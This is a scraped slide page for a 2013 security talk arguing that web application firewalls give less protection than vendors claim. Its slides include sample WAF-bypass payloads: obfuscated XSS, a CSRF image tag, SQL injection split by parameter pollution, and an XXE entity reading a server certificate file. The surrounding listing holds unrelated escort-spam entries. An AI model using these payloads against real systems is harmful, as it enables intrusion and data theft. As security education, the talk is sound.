Gewinnen Sie Menschen und Ziele - Referat von Andi Odermatt
Gewinnen Sie Menschen und Ziele - Referat von Andi OdermattGewinnen Sie Menschen und Ziele - Referat von Andi Odermatt
Gewinnen Sie Menschen und Ziele - Referat von Andi Odermatt
 
Querdenken mit Kreativitätsmethoden – XING Expertendialog
Querdenken mit Kreativitätsmethoden – XING ExpertendialogQuerdenken mit Kreativitätsmethoden – XING Expertendialog
Querdenken mit Kreativitätsmethoden – XING Expertendialog
 
Xing LearningZ: Digitale Geschäftsmodelle entwickeln
Xing LearningZ: Digitale Geschäftsmodelle entwickelnXing LearningZ: Digitale Geschäftsmodelle entwickeln
Xing LearningZ: Digitale Geschäftsmodelle entwickeln
 
Swiss IPv6 Council: The Cisco-Journey to an IPv6-only Building
Swiss IPv6 Council: The Cisco-Journey to an IPv6-only BuildingSwiss IPv6 Council: The Cisco-Journey to an IPv6-only Building
Swiss IPv6 Council: The Cisco-Journey to an IPv6-only Building
 
UX – Schlüssel zum Erfolg im Digital Business
UX – Schlüssel zum Erfolg im Digital BusinessUX – Schlüssel zum Erfolg im Digital Business
UX – Schlüssel zum Erfolg im Digital Business
 
Minenfeld IPv6
Minenfeld IPv6Minenfeld IPv6
Minenfeld IPv6
 
Was ist design thinking
Was ist design thinkingWas ist design thinking
Was ist design thinking
 
Die IPv6 Journey der ETH Zürich
Die IPv6 Journey der ETH Zürich Die IPv6 Journey der ETH Zürich
Die IPv6 Journey der ETH Zürich
 
Xing LearningZ: Die 10 + 1 Trends im (E-)Commerce
Xing LearningZ: Die 10 + 1 Trends im (E-)CommerceXing LearningZ: Die 10 + 1 Trends im (E-)Commerce
Xing LearningZ: Die 10 + 1 Trends im (E-)Commerce
 
Zahlen Battle: klassische werbung vs.online-werbung-somexcloud
Zahlen Battle: klassische werbung vs.online-werbung-somexcloudZahlen Battle: klassische werbung vs.online-werbung-somexcloud
Zahlen Battle: klassische werbung vs.online-werbung-somexcloud
 
General data protection regulation-slides
General data protection regulation-slidesGeneral data protection regulation-slides
General data protection regulation-slides
 

Recently uploaded

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 

Recently uploaded (20)

Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 

«We protect your website» – No you don`t

  • 1. “We protect you applications”! “No, you don’t” Digicomp Hacking Day 2013 May 16th 2013
  • 2. Sven Vetsch §  Partner & CTO at Redguard AG §  www.redguard.ch §  Specialized in Application Security §  (Web, Web-Services, Mobile, …) §  Leader OWASP Switzerland §  www.owasp.org / www.owasp.ch sven.vetsch@redguard.ch Twitter: @disenchant_ch / @redguard_ch
  • 3. Sven Vetsch §  Partner & CTO at Redguard AG §  www.redguard.ch §  Specialized in Application Security §  (Web, Web-Services, Mobile, …) §  Leader OWASP Switzerland §  www.owasp.org / www.owasp.ch sven.vetsch@redguard.ch Twitter: @disenchant_ch / @redguard_ch
  • 4. Disclaimer This presentation is focused on classic WAF functionality so we won’t get into Single-Sign- On, Content Injection and so on. All the views in this presentation are my own and not necessarily those of Redguard AG.
  • 5. Outline WAF  in   numbers   What  do   vendors  tell   you   Bypassing   techniques  
  • 7. >80%  of organizations were attacked successfully at least once in 2011 Perceptions About Network Security - Ponemon Institute© Research Report, 2011
  • 9. 23%   already experienced a data or system breach as a result of an application layer vulnerability WhiteHat Security – Website Security Statistics Report May 2013
  • 10. … only 29% in banking 55.6%  of all organizations use WAFs WhiteHat Security – Website Security Statistics Report May 2013
  • 11. WAF Deployment by Industry WhiteHat Security – Website Security Statistics Report May 2013 29 30 17 30 32 30 50 20 12 10 10 8 43 30 17 30 36 29 17 10 12 Banking Financial Services Healthcare Retail Technology Monitoring and actively blocking attacks Currently only monitoring traffic Installing and/or configuration mode No WAF deployed Don't know
  • 12. WAF usage after a breach 38% 19% 6% 6% 31% Monitoring and actively blocking attacks Currently only monitoring traffic Installing and/or configuration mode Don't know No WAF deployed WhiteHat Security – Website Security Statistics Report May 2013
  • 13. 62%  of attacks can be blocked by a WAF with default rule sets NT OBJECTives - Analyzing the Effectiveness of Web Application Firewalls 2011
  • 14. Organizations with a Web Application Firewall deployed had 11% more vulnerabilities, resolved them 8% slower, and had a 7% lower remediation rate. WhiteHat Security – Website Security Statistics Report May 2013
  • 15. A WAF makes me less secure!?
  • 16. §  Possible reasons: §  Insufficient global security processes §  Rules are not sufficient §  Not enough resources to manage the WAF §  WAFs are threated as if they could solve all problem §  WAFs are only in monitoring mode instead of blocking anything §  …
  • 17. A WAF is a tool, not a solution
  • 18. Don’t worry, there are also good news
  • 19. By summing all these percentages up we could safely say that a WAF could feasible help mitigate the risk of at least 71% of all custom web application vulnerabilities WhiteHat Security – Website Security Statistics Report May 2012
  • 21. 12 May 2013 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch 21 Vendor Supplied Certificate “[Product] guarantees security of web applications.”
  • 22. 12 May 2013 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch 22 Vendor Supplied Certificate “The [Company] Web Application Firewall quickly protects web servers from data breaches and websites from defacement without administrators waiting for clean code or even knowing how an application works.”
  • 23. 12 May 2013 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch 23 Vendor Supplied Certificate “Fully addresses PCI 6.6”
  • 24. 15 May 2013 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch 24 Vendor Supplied Certificate “Fully addresses PCI 6.6” Data Security Standard v2 6.6 For public-facing web applications, address new threats and vulnerabilities on an ongoing basis and ensure these applications are protected against known attacks by either of the following methods: •  Reviewing public-facing web applications via manual or automated application vulnerability security assessment tools or methods, at least annually and after any changes •  Installing a web-application firewall in front of public-facing web applications
  • 25. 12 May 2013 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch 25 Vendor Supplied Certificate “Because of its unique blend of HTML and XML security, the [Company] Web Application Firewall provides a full compliance solution for the PCI DSS sections 6.5 and 6.6, which mandate the implementation of a Web application firewall by June 30, 2008.”
  • 26. 15 May 2013 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch 26 Vendor Supplied Certificate “Because of its unique blend of HTML and XML security, the [Company] Web Application Firewall provides a full compliance solution for the PCI DSS sections 6.5 and 6.6, which mandate the implementation of a Web application firewall by June 30, 2008.” Data Security Standard v2 6.5 Develop applications based on secure coding guidelines. Prevent common coding vulnerabilities in software development processes, to include the following: [OWASP Top 10]
  • 27. 15 May 2013 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch 27 Vendor Supplied Certificate The [Product] offers you the following technical features: •  ... •  Session fixation •  …
  • 28. 12 May 2013 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch 28 Vendor Supplied Certificate The [Product] offers you the following technical features: •  ... •  Session fixation •  …
  • 30. Insecure Rules §  Let’s take the following pseudo rule: if ($path == "/admin") { if ($ipaddr == $internal_ipaddr) [block request] else [allow request] }
  • 33. Insecure Rules "/admin" == "/admin" -> true "/../admin" == "/admin" -> false
  • 34. XSS – Obfuscation §  When non-security people talk about XSS <script>alert("XSS");</script>
  • 35. XSS – Obfuscation §  When security people talk about XSS <script>alert(String.fromCharCode(88, 83,83));</script> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#1 08;&#101;&#114;&#116;&#40;&#39;&#88;& #83;&#83;&#39;&#41;>
  • 36. XSS – Obfuscation §  When appsec people talk about XSS <script> window[(+{}+[])[-~[]]+(![]+[])[-~- ~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[]) [-~[]]+(!![]+[])[+[]]](("XSS")) </script>
  • 37. XSS – Obfuscation §  When appsec people talk about XSS <script> [][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[] +!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+ [])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+ []]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+ []+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]] +(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([] [[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+ []]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]] ((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[]) [+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+ ([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!! []+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+ [])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[]) [+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+ {})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[]) [+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+… </script> Try it yourself: http://patriciopalladino.com/files/hieroglyphy/
  • 38. DOM-based XSS <!DOCTYPE html> <html> <body> Hello <span id="name"></span> <script> document.getElementById("name").innerHTML = document.location.hash.slice(1); </script> </body> </html>
  • 39. DOM-based XSS <!DOCTYPE html> <html> <body> Hello <span id="name"></span> <script> document.getElementById("name").innerHTML = document.location.hash.slice(1); </script> </body> </html>
  • 42. A XSS attack like the one showed neverhits the server … so screw your WAF
  • 43. Cross-Site Request Forgery (CSRF) http://www.evil.com http://www.nice.com 1 3 2 <img src=“http:// www.nice.com /buy? article=123” />
  • 44. Without understanding the application or modifying the HTTP response, a WAF can’t protect against CSRF attacks.
  • 45. … my experience would be more around 50% 11.2%  of all application are vulnerable to CSRF attacks WhiteHat Security – Website Security Statistics Report May 2013
  • 46. HTTP Parameter Pollution (HPP) http://www.google.com/? q=<script>&q=alert("XSS")&q=</script>
  • 47. HTTP Parameter Pollution (HPP) http://www.example.com/?id=1&id=2 Technology   Behavior   Result   ASP  /  ASP.NET   ConcatenaJon   id=1,2   PHP   Last  occurrence   id=2   Java   First  occurrence   id=1  
  • 48. HTTP Parameter Pollution (HPP) §  Let’s have a look at the following simple pseudo rule against SQL Injection attacks: if $param_id.match(/.*select.*from.*/) [block request]
  • 49. HTTP Parameter Pollution (HPP) http://www.example.com/page.aspx?id=123 http://www.example.com/page.aspx? id=123;select%201,password%20from%20 users;%20-- http://www.example.com/page.aspx? id=123;&id=select%201&id=password%20from %20users;%20--
  • 50. HTTP Parameter Pollution (HPP) http://www.example.com/page.aspx? id=123;&id=select%201&id=password%20from %20users;%20-- §  id = 123; §  id = select 1 §  id = password from users; -- -> 123; select 1,password from users; --
  • 52. More things your WAF isn’t good at §  Anti-Automation and process validation §  Understanding application logic §  Insufficient Authentication & Authorization §  Brute Force Attacks §  Session Fixation §  Anomaly Detection §  Improper Filesystem Permissions §  Securing client side running code §  …
  • 53. Hacking a WAF (for fun and profit) §  In the past, WAFs also suffered from vulnerabilities like: §  Filter Bypasses (a lot of them!!!) §  XSS in their web admin interface §  CSRF in their web admin interface §  Default SSH root passwords §  Information Disclosure about the LAN/DMZ §  Arbitrary remote command execution §  XML External Entity (XXE) Attacks
  • 54. Hacking a WAF (for fun and profit) Example scenario based on ModSecurity XML External Entity (XXE) vulnerability CVE-2013-1915
  • 55. Hacking a WAF (for fun and profit) WAF
  • 56. Hacking a WAF (for fun and profit) /etc/apache2/ssl/cert.pem WAF
  • 57. Hacking a WAF (for fun and profit) Request: Response: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/apache2/ssl/cert.pem" >]><foo>&xxe;</foo>
  • 58. Hacking a WAF (for fun and profit) WAF
  • 60. Conclusion WAFs … §  are good – at least they can help you §  must be tuned by a trained professional §  can’t compensate insecure code §  aren’t an alternative to patching vulnerabilities §  can generate a lot of profit for vendors so be careful about what features you really need and how well they perform §  don’t solve all your appsec problems
  • 61. We should accept WAFs for what they really are: a method of increasing the cost of attacks, but not necessarily one that might repel every attacker. Ivan Ristic